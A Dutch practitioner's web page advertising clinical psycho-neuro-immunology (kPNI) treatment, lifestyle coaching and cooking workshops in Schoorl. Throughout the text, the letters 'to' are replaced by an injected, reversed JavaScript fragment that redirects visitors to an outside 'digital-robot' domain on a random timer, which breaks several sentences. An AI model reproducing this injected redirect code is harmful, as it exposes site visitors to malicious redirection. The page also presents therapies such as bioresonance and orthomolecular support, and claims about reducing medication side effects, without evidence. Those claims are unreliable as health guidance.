//Klinische Psycho-Neuro-Immunologie (kPNI) en Endocrinologie
Klinische Psycho-Neuro-Immunologie (kPNI) en Endocrinologie 2018-07-27T14:40:41+01:00

Klinische Psycho-Neuro-Immunologie (kPNI) en endocrinologie

Klinische psychologie – neurologie – immunologie (kPNI) is een wetenschap die het menselijk lichaam als geheel benadert om zo de oplossing voor veelal terugkerende letsels en welvaartsziekten te vinden. Je kunt kPNI ook wel leefstijlgeneeskunde noemen. Elke dag ervaren veel mensen lichamelijke en geestelijke klachten die maar niet worden opgelost. Traditioneel wordt er naar de klacht gekeken, waarna iedereen met dezelfde klacht op dezelfde wijze wordt behandeld. Terwijl elke klacht het resultaat is van een dieperliggend probleem en dat is iets individueels. Het symptobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toom is vrijwel nooit het echte probleem.

kPNI biedt daarbij wetenschappelijke inzichten en zet deze kennis om in praktijk zodat de oorzaak achterhaald en opgelost kan worden. Dat laatste gebeurt aan de hand van bijvoorbeeld fysiotherapie, acupunctuur, integrale manuele therapie, bioresonantie, voeding coaching, beweging coaching, leefstijl analyse, mentaal coaching, orthomoleculaire ondersteuning, vaak in combinatie met elkaar. Steeds staat daarbij de patiënt centraal, niet de klacht. Bovendien kan kPNI preventief werken en helpt het de werking van medicatie te versterken en de bijwerkingen op het lichaam te minimaliseren. Leefstijlgeneeskunde is een onderdeel van kPNI.

Om al deze redenen maakt kPNI inmiddels deel uit van mijn praktijk. In mijn centrum heb ik de ruimte om iedereen individueel te adviseren en zo nodig te begeleiden. Naast behandelingen, kan ik ontspanning en bewegingsadviezen geven, in het prachtige bos/duingebied van Schoorl. En voor (klacht gerichte) kookworkshops is er een keuken aanwezig.

Hoe ik jouw (lichamelijke) klachten behandel volgens kPNI
Het symptobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toom is nooit het échte probleem. De oorzaak van je aanhoudende klacht schuilt vaak in iets wat je nog niet weet, anders was het mogelijk al opgelost. Een ‘klein, onschuldig’ probleem uit het verleden kan nu en later voor grote problemen of ziektebeelden zorgen. De oplossing ligt dus in het verleden en in deze zoektobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tocht maakt kPNI het verschil. Ik kijk verder dan het symptobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toom en leg je haarfijn uit hoe een vroegere niet opgeloste (psychische of lichamelijke) wond kan leiden tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tot je uiteindelijke ziekte.

Gezamenlijk doorgronden we ‘hoe’ en ‘waarom’ jouw klacht is ontstaan en koppelen daar een aangepaste behandeling aan, waarbij de kPNI de rode draad is. Achter elke patiënt en klacht schuilt een individueel verhaal, waardoor er bij mij geen standaard behandeling bestaat. Twee personen met dezelfde klacht hebben zo goed als nooit baat bij dezelfde behandeling.

Ik behandel jou dus als individu met je klacht en niet andersom. Ik geef je zelf de tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tools om de genezing te versnellen. Vanuit de kPNI is de overtuiging dat hier het begin van de oplossing ligt.

Meer weten? Neem dan gerust contact op voor meer informatie of het maken van een afspraak.

 

Interessant om te lezen